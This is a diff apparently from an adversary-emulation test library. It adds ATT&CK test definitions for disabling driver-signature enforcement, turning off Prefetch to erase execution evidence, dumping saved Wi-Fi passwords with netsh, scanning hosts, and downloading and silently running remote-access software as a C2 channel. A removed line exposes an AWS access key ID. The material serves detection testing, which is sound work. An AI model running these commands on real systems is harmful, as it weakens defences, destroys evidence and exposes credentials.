+        signing policy, enabling the execution of unsigned drivers.
+      supported_platforms:
+      - windows
+      executor:
+        command: bcdedit /set testsigning on
+        cleanup_command: bcdedit /set testsigning off
+        name: command_prompt
+        elevation_required: true
  T1610:
    technique:
      modified: '2024-04-11T21:24:42.680Z'
@@ -11199,6 +11211,26 @@ defense-evasion:
          /f >nul 2>&1)'
        name: command_prompt
        elevation_required: true
+    - name: Disable Windows Prefetch Through Registry
+      auto_generated_guid: 7979dd41-2045-48b2-a54e-b1bc2415c9da
+      description: 'Modify the registry of the machine to disable prefetch. Disabling
+        prefetch will remove one artifact for evidence of application execution. Restart
+        is required post modification
+
+        '
+      supported_platforms:
+      - windows
+      executor:
+        command: 'reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory
+          Management\PrefetchParameters" /v "EnablePrefetcher" /t REG_DWORD /d 0 /f
+
+          '
+        cleanup_command: 'reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory
+          Management\PrefetchParameters" /v "EnablePrefetcher" /t REG_DWORD /d 3 /f
+
+          '
+        name: command_prompt
+        elevation_required: true
  T1574.008:
    technique:
      modified: '2023-05-09T14:00:00.188Z'
@@ -60895,6 +60927,10 @@ command-and-control:
          description: Path of MSP360 executable
          type: path
          default: "$env:ProgramFiles\\Connect\\Connect.exe"
+        MSP360_Download_Url:
+          description: URL to download MSP360 Connect from
+          type: url
+          default: 
      dependency_executor_name: powershell
      dependencies:
      - description: 'MSP360 must exist at (#{MSP360_Connect_Path})
@@ -60906,8 +60942,8 @@ command-and-control:
          '
        get_prereq_command: "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\"
          -ErrorAction Ignore -Force | Out-Null\nInvoke-WebRequest -OutFile \"PathToAtomicsFolder\\..\\ExternalPayloads\\msp360connect.exe\"
-          \"https://s3.amazonaws.com/cb_setups/_current/cbra/setup.exe?X-Amz-Expires=604800&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIA2WIZE3YN7NOSY65U/20230515/us-east-1/s3/aws4_request&X-Amz-Date=20230515T024742Z&X-Amz-SignedHeaders=host&response-content-disposition=attachment;filename=ConnectStandaloneSetup_v3.3.0.15_netv4.5.1_cFA9100C6.exe&X-Amz-Signature=1fe3ddf93f8431b182fac90341f80a4ebf8665ddcc0e36dd385ee20d0ce865c9\"\nstart-process
-          \"PathToAtomicsFolder\\..\\ExternalPayloads\\msp360connect.exe\" /S    \n"
+          \"#{MSP360_Download_Url}\"\nstart-process \"PathToAtomicsFolder\\..\\ExternalPayloads\\msp360connect.exe\"
+          /S    \n"
      executor:
        command: 'Start-Process #{MSP360_Connect_Path}

@@ -60933,6 +60969,41 @@ command-and-control:
          $file = Join-Path $env:USERPROFILE "Desktop\rustdesk-1.2.3-1-x86_64.exe"
          Remove-Item $file1 -ErrorAction Ignore
        name: powershell
+    - name: Splashtop Execution
+      auto_generated_guid: b025c580-029e-4023-888d-a42710d76934
+      description: |
+        An adversary may attempt to trick the user into downloading Splashtop for use as a C2 channel.
+        Upon successful execution, Splashtop will be executed.
+      supported_platforms:
+      - windows
+      input_arguments:
+        Splashtop_Path:
+          description: Path of Splashtop executable
+          type: path
+          default: "${env:programfiles(x86)}\\Splashtop\\Splashtop Remote\\Client
+            for STP\\strwinclt.exe"
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Splashtop must exist at "#{Splashtop_Path}"
+
+          '
+        prereq_command: 'if (Test-Path "#{Splashtop_Path}") {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\"
+          -ErrorAction Ignore -Force | Out-Null\nInvoke-WebRequest -OutFile \"PathToAtomicsFolder\\..\\ExternalPayloads\\splashtop_install.exe\"
+          \"https://download.splashtop.com/winclient/STP/Splashtop_Personal_Win_v3.6.6.0.exe\"\nstart-sleep
+          30\nstart-process \"PathToAtomicsFolder\\..\\ExternalPayloads\\splashtop_install.exe\"
+          /S  \nstart-sleep 30      \n"
+      executor:
+        command: 'Start-Process "#{Splashtop_Path}"
+
+          '
+        cleanup_command: 'Stop-Process -Name "strwinclt" -force -erroraction silentlycontinue
+
+          '
+        name: powershell
+        elevation_required: true
  T1659:
    technique:
      modified: '2023-10-01T02:28:45.147Z'
@@ -81663,7 +81734,7 @@ discovery:
  T1016.002:
    technique:
      modified: '2023-10-05T11:35:30.887Z'
-      name: Wi-Fi Discovery
+      name: 'System Network Configuration Discovery: Wi-Fi Discovery'
      description: |
        Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems. Adversaries may use Wi-Fi information as part of [Account Discovery](https://attack.mitre.org/techniques/T1087), [Remote System Discovery](https://attack.mitre.org/techniques/T1018), and other discovery or [Credential Access](https://attack.mitre.org/tactics/TA0006) activity to support both ongoing and future campaigns.

@@ -81730,7 +81801,19 @@ discovery:
      x_mitre_attack_spec_version: 3.2.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
      spec_version: '2.1'
-    atomic_tests: []
+      identifier: T1016.002
+    atomic_tests:
+    - name: Enumerate Stored Wi-Fi Profiles And Passwords via netsh
+      auto_generated_guid: 53cf1903-0fa7-4177-ab14-f358ae809eec
+      description: Upon successful execution, information about previously connected
+        Wi-Fi networks will be displayed with their corresponding key (if present).
+      supported_platforms:
+      - windows
+      executor:
+        command: netsh wlan show profile * key=clear
+        cleanup_command: 
+        name: command_prompt
+        elevation_required: false
  T1010:
    technique:
      modified: '2023-10-31T14:00:00.188Z'
@@ -84855,6 +84938,40 @@ discovery:

          '
        name: command_prompt
+    - name: Enumerate Remote Hosts with Netscan
+      auto_generated_guid: b8147c9a-84db-4ec1-8eee-4e0da75f0de5
+      description: This test uses Netscan to identify remote hosts in a specified
+        network range.
+      supported_platforms:
+      - windows
+      input_arguments:
+        netscan_path:
+          description: NetScan exe location
+          type: path
+          default: PathToAtomicsFolder\..\ExternalPayloads\netscan\64-bit\netscan.exe
+        range_to_scan:
+          description: The IP range to scan with Netscan
+          type: string
+          default: 127.0.0.1-127.0.0.1
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Netscan must be installed
+
+          '
+        prereq_command: if (Test-Path "#{netscan_path}") {exit 0} else {exit 1}
+        get_prereq_command: |
+          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+          Invoke-WebRequest -OutFile "PathToAtomicsFolder\..\ExternalPayloads\netscan.zip" "https://www.softperfect.com/download/files/netscan_portable.zip"
+          Expand-Archive -LiteralPath "PathToAtomicsFolder\..\ExternalPayloads\netscan.zip" -DestinationPath "PathToAtomicsFolder\..\ExternalPayloads\netscan"
+      executor:
+        command: cmd /c '#{netscan_path}' /hide /auto:"$env:temp\T1018NetscanOutput.txt"
+          /range:'#{range_to_scan}'
+        cleanup_command: 'remove-item "$env:temp\T1018NetscanOutput.txt" -force -erroraction
+          silentlycontinue
+
+          '
+        name: powershell
+        elevation_required: false
  T1046:
    technique:
      modified: '2023-08-11T21:10:09.547Z'
@@ -0,0 +1,42 @@
+# T1016.002 - System Network Configuration Discovery: Wi-Fi Discovery
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1016/002)
+<blockquote>Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems. Adversaries may use Wi-Fi information as part of [Account Discovery](https://attack.mitre.org/techniques/T1087), [Remote System Discovery](https://attack.mitre.org/techniques/T1018), and other discovery or [Credential Access](https://attack.mitre.org/tactics/TA0006) activity to support both ongoing and future campaigns.
+
+Adversaries may collect various types of information about Wi-Fi networks from hosts. For example, on Windows names and passwords of all Wi-Fi networks a device has previously connected to may be available through `netsh wlan show profiles` to enumerate Wi-Fi names and then `netsh wlan show profile “Wi-Fi name” key=clear` to show a Wi-Fi network’s corresponding password.(Citation: BleepingComputer Agent Tesla steal wifi passwords)(Citation: Malware Bytes New AgentTesla variant steals WiFi credentials)(Citation: Check Point APT35 CharmPower January 2022) Additionally, names and other details of locally reachable Wi-Fi networks can be discovered using calls to `wlanAPI.dll` [Native API](https://attack.mitre.org/techniques/T1106) functions.(Citation: Binary Defense Emotes Wi-Fi Spreader)
+
+On Linux, names and passwords of all Wi-Fi-networks a device has previously connected to may be available in files under ` /etc/NetworkManager/system-connections/`.(Citation: Wi-Fi Password of All Connected Networks in Windows/Linux) On macOS, the password of a known Wi-Fi may be identified with ` security find-generic-password -wa wifiname` (requires admin username/password).(Citation: Find Wi-Fi Password on Mac)
+</blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - Enumerate Stored Wi-Fi Profiles And Passwords via netsh](#atomic-test-1---enumerate-stored-wi-fi-profiles-and-passwords-via-netsh)
+
+
+<br/>
+
+## Atomic Test #1 - Enumerate Stored Wi-Fi Profiles And Passwords via netsh
+Upon successful execution, information about previously connected Wi-Fi networks will be displayed with their corresponding key (if present).
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 53cf1903-0fa7-4177-ab14-f358ae809eec
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+netsh wlan show profile * key=clear
+```
+
+
+
+
+
+
+<br/>
@@ -2,7 +2,7 @@ attack_technique: T1016.002
 display_name: "System Network Configuration Discovery: Wi-Fi Discovery"
 atomic_tests:
 - name: Enumerate Stored Wi-Fi Profiles And Passwords via netsh
-  auto_generated_guid:
+  auto_generated_guid: 53cf1903-0fa7-4177-ab14-f358ae809eec
  description: Upon successful execution, information about previously connected Wi-Fi networks will be displayed with their corresponding key (if present).
  supported_platforms:
  - windows
@@ -51,6 +51,8 @@ Adversaries may also target discovery of network infrastructure as well as lever

 - [Atomic Test #21 - Remote System Discovery - net group Domain Controller](#atomic-test-21---remote-system-discovery---net-group-domain-controller)

+- [Atomic Test #22 - Enumerate Remote Hosts with Netscan](#atomic-test-22---enumerate-remote-hosts-with-netscan)
+

 <br/>

@@ -838,4 +840,56 @@ net group /domain "Domain controllers"



+<br/>
+<br/>
+
+## Atomic Test #22 - Enumerate Remote Hosts with Netscan
+This test uses Netscan to identify remote hosts in a specified network range.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** b8147c9a-84db-4ec1-8eee-4e0da75f0de5
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| netscan_path | NetScan exe location | path | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;netscan&#92;64-bit&#92;netscan.exe|
+| range_to_scan | The IP range to scan with Netscan | string | 127.0.0.1-127.0.0.1|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+cmd /c '#{netscan_path}' /hide /auto:"$env:temp\T1018NetscanOutput.txt" /range:'#{range_to_scan}'
+```
+
+#### Cleanup Commands:
+```powershell
+remove-item "$env:temp\T1018NetscanOutput.txt" -force -erroraction silentlycontinue
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: Netscan must be installed
+##### Check Prereq Commands:
+```powershell
+if (Test-Path "#{netscan_path}") {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+Invoke-WebRequest -OutFile "PathToAtomicsFolder\..\ExternalPayloads\netscan.zip" "https://www.softperfect.com/download/files/netscan_portable.zip"
+Expand-Archive -LiteralPath "PathToAtomicsFolder\..\ExternalPayloads\netscan.zip" -DestinationPath "PathToAtomicsFolder\..\ExternalPayloads\netscan"
+```
+
+
+
+
 <br/>
@@ -405,6 +405,7 @@ atomic_tests:
      net group /domain "Domain controllers"
    name: command_prompt
 - name: Enumerate Remote Hosts with Netscan
+  auto_generated_guid: b8147c9a-84db-4ec1-8eee-4e0da75f0de5
  description: This test uses Netscan to identify remote hosts in a specified network range. 
  supported_platforms:
  - windows
@@ -150,6 +150,8 @@ The Registry of a remote system may be modified to aid in execution of files as

 - [Atomic Test #70 - Enable RDP via Registry (fDenyTSConnections)](#atomic-test-70---enable-rdp-via-registry-fdenytsconnections)

+- [Atomic Test #71 - Disable Windows Prefetch Through Registry](#atomic-test-71---disable-windows-prefetch-through-registry)
+

 <br/>

@@ -2583,4 +2585,36 @@ if #{remove_rdp_access_during_cleanup} EQU 1 (reg delete "HKLM\SYSTEM\CurrentCon



+<br/>
+<br/>
+
+## Atomic Test #71 - Disable Windows Prefetch Through Registry
+Modify the registry of the machine to disable prefetch. Disabling prefetch will remove one artifact for evidence of application execution. Restart is required post modification
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 7979dd41-2045-48b2-a54e-b1bc2415c9da
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters" /v "EnablePrefetcher" /t REG_DWORD /d 0 /f
+```
+
+#### Cleanup Commands:
+```cmd
+reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters" /v "EnablePrefetcher" /t REG_DWORD /d 3 /f
+```
+
+
+
+
+
 <br/>
@@ -1088,6 +1088,7 @@ atomic_tests:
    name: command_prompt
    elevation_required: true   
 - name: Disable Windows Prefetch Through Registry 
+  auto_generated_guid: 7979dd41-2045-48b2-a54e-b1bc2415c9da
  description: |
    Modify the registry of the machine to disable prefetch. Disabling prefetch will remove one artifact for evidence of application execution. Restart is required post modification
  supported_platforms:
@@ -34,6 +34,8 @@ Installation of many remote access software may also include persistence (e.g.,

 - [Atomic Test #12 - RustDesk Files Detected Test on Windows](#atomic-test-12---rustdesk-files-detected-test-on-windows)

+- [Atomic Test #13 - Splashtop Execution](#atomic-test-13---splashtop-execution)
+

 <br/>

@@ -498,6 +500,7 @@ Upon successful execution, MSP360 Connect will be executed.
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | MSP360_Connect_Path | Path of MSP360 executable | path | $env:ProgramFiles&#92;Connect&#92;Connect.exe|
+| MSP360_Download_Url | URL to download MSP360 Connect from | url | |


 #### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
@@ -523,7 +526,7 @@ if (Test-Path #{MSP360_Connect_Path}) {exit 0} else {exit 1}
 ##### Get Prereq Commands:
 ```powershell
 New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
-Invoke-WebRequest -OutFile "PathToAtomicsFolder\..\ExternalPayloads\msp360connect.exe" "https://s3.amazonaws.com/cb_setups/_current/cbra/setup.exe?X-Amz-Expires=604800&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIA2WIZE3YN7NOSY65U/20230515/us-east-1/s3/aws4_request&X-Amz-Date=20230515T024742Z&X-Amz-SignedHeaders=host&response-content-disposition=attachment;filename=ConnectStandaloneSetup_v3.3.0.15_netv4.5.1_cFA9100C6.exe&X-Amz-Signature=1fe3ddf93f8431b182fac90341f80a4ebf8665ddcc0e36dd385ee20d0ce865c9"
+Invoke-WebRequest -OutFile "PathToAtomicsFolder\..\ExternalPayloads\msp360connect.exe" "#{MSP360_Download_Url}"
 start-process "PathToAtomicsFolder\..\ExternalPayloads\msp360connect.exe" /S
 ```

@@ -566,4 +569,58 @@ Remove-Item $file1 -ErrorAction Ignore



+<br/>
+<br/>
+
+## Atomic Test #13 - Splashtop Execution
+An adversary may attempt to trick the user into downloading Splashtop for use as a C2 channel.
+Upon successful execution, Splashtop will be executed.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** b025c580-029e-4023-888d-a42710d76934
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| Splashtop_Path | Path of Splashtop executable | path | ${env:programfiles(x86)}&#92;Splashtop&#92;Splashtop Remote&#92;Client for STP&#92;strwinclt.exe|
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+Start-Process "#{Splashtop_Path}"
+```
+
+#### Cleanup Commands:
+```powershell
+Stop-Process -Name "strwinclt" -force -erroraction silentlycontinue
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: Splashtop must exist at "#{Splashtop_Path}"
+##### Check Prereq Commands:
+```powershell
+if (Test-Path "#{Splashtop_Path}") {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+Invoke-WebRequest -OutFile "PathToAtomicsFolder\..\ExternalPayloads\splashtop_install.exe" "https://download.splashtop.com/winclient/STP/Splashtop_Personal_Win_v3.6.6.0.exe"
+start-sleep 30
+start-process "PathToAtomicsFolder\..\ExternalPayloads\splashtop_install.exe" /S  
+start-sleep 30
+```
+
+
+
+
 <br/>
@@ -286,6 +286,7 @@ atomic_tests:
      Remove-Item $file1 -ErrorAction Ignore
    name: powershell
 - name: Splashtop Execution
+  auto_generated_guid: b025c580-029e-4023-888d-a42710d76934
  description: |
    An adversary may attempt to trick the user into downloading Splashtop for use as a C2 channel.
    Upon successful execution, Splashtop will be executed.
@@ -1,10 +1,47 @@
-# T1553.006 - Subvert Trust Controls: Code Signing Policy Modification 
+# T1553.006 - Subvert Trust Controls: Code Signing Policy Modification
 ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1553/006)
-<blockquote>Adversaries may modify code signing policies to enable execution of unsigned or self-signed code. Code signing provides a level of authenticity on a program from a developer and a guarantee that the program has not been tampered with. Security controls can include enforcement mechanisms to ensure that only valid, signed code can be run on an operating system.
+<blockquote>Adversaries may modify code signing policies to enable execution of unsigned or self-signed code. Code signing provides a level of authenticity on a program from a developer and a guarantee that the program has not been tampered with. Security controls can include enforcement mechanisms to ensure that only valid, signed code can be run on an operating system. 

-Some of these security controls may be enabled by default, such as Driver Signature Enforcement (DSE) on Windows or System Integrity Protection (SIP) on macOS. Other such controls may be disabled by default but are configurable through application controls, such as only allowing signed Dynamic-Link Libraries (DLLs) to execute on a system. Since it can be useful for developers to modify default signature enforcement policies during the development and testing of applications, disabling of these features may be possible with elevated permissions.
+Some of these security controls may be enabled by default, such as Driver Signature Enforcement (DSE) on Windows or System Integrity Protection (SIP) on macOS.(Citation: Microsoft DSE June 2017)(Citation: Apple Disable SIP) Other such controls may be disabled by default but are configurable through application controls, such as only allowing signed Dynamic-Link Libraries (DLLs) to execute on a system. Since it can be useful for developers to modify default signature enforcement policies during the development and testing of applications, disabling of these features may be possible with elevated permissions.(Citation: Microsoft Unsigned Driver Apr 2017)(Citation: Apple Disable SIP)

-Adversaries may modify code signing policies in a number of ways, including through use of command-line or GUI utilities, Modify Registry, rebooting the computer in a debug/recovery mode, or by altering the value of variables in kernel memory. Examples of commands that can modify the code signing policy of a system include bcdedit.exe -set TESTSIGNING ON on Windows and csrutil disable on macOS. Depending on the implementation, successful modification of a signing policy may require reboot of the compromised system. Additionally, some implementations can introduce visible artifacts for the user (ex: a watermark in the corner of the screen stating the system is in Test Mode). Adversaries may attempt to remove such artifacts.
+Adversaries may modify code signing policies in a number of ways, including through use of command-line or GUI utilities, [Modify Registry](https://attack.mitre.org/techniques/T1112), rebooting the computer in a debug/recovery mode, or by altering the value of variables in kernel memory.(Citation: Microsoft TESTSIGNING Feb 2021)(Citation: Apple Disable SIP)(Citation: FireEye HIKIT Rootkit Part 2)(Citation: GitHub Turla Driver Loader) Examples of commands that can modify the code signing policy of a system include <code>bcdedit.exe -set TESTSIGNING ON</code> on Windows and <code>csrutil disable</code> on macOS.(Citation: Microsoft TESTSIGNING Feb 2021)(Citation: Apple Disable SIP) Depending on the implementation, successful modification of a signing policy may require reboot of the compromised system. Additionally, some implementations can introduce visible artifacts for the user (ex: a watermark in the corner of the screen stating the system is in Test Mode). Adversaries may attempt to remove such artifacts.(Citation: F-Secure BlackEnergy 2014)

-To gain access to kernel memory to modify variables related to signature checks, such as modifying g_CiOptions to disable Driver Signature Enforcement, adversaries may conduct Exploitation for Privilege Escalation using a signed, but vulnerable driver.
-</blockquote>
+To gain access to kernel memory to modify variables related to signature checks, such as modifying <code>g_CiOptions</code> to disable Driver Signature Enforcement, adversaries may conduct [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068) using a signed, but vulnerable driver.(Citation: Unit42 AcidBox June 2020)(Citation: GitHub Turla Driver Loader)</blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - Code Signing Policy Modification](#atomic-test-1---code-signing-policy-modification)
+
+
+<br/>
+
+## Atomic Test #1 - Code Signing Policy Modification
+Allows adversaries to subvert trust controls by modifying the code signing policy, enabling the execution of unsigned drivers.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** bb6b51e1-ab92-45b5-aeea-e410d06405f8
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+bcdedit /set testsigning on
+```
+
+#### Cleanup Commands:
+```cmd
+bcdedit /set testsigning off
+```
+
+
+
+
+
+<br/>
@@ -2,6 +2,7 @@ attack_technique: T1553.006
 display_name: 'Subvert Trust Controls: Code Signing Policy Modification'
 atomic_tests:
 - name: Code Signing Policy Modification
+  auto_generated_guid: bb6b51e1-ab92-45b5-aeea-e410d06405f8
  description: Allows adversaries to subvert trust controls by modifying the code signing policy, enabling the execution of unsigned drivers.
  supported_platforms:
  - windows
@@ -1604,3 +1604,8 @@ d1fa2a69-b0a2-4e8a-9112-529b00c19a41
 81cfdd7f-1f41-4cc5-9845-bb5149438e37
 b19d74b7-5e72-450a-8499-82e49e379d1a
 966f4c16-1925-4d9b-8ce0-01334ee0867d
+b8147c9a-84db-4ec1-8eee-4e0da75f0de5
+53cf1903-0fa7-4177-ab14-f358ae809eec
+bb6b51e1-ab92-45b5-aeea-e410d06405f8
+b025c580-029e-4023-888d-a42710d76934
+7979dd41-2045-48b2-a54e-b1bc2415c9da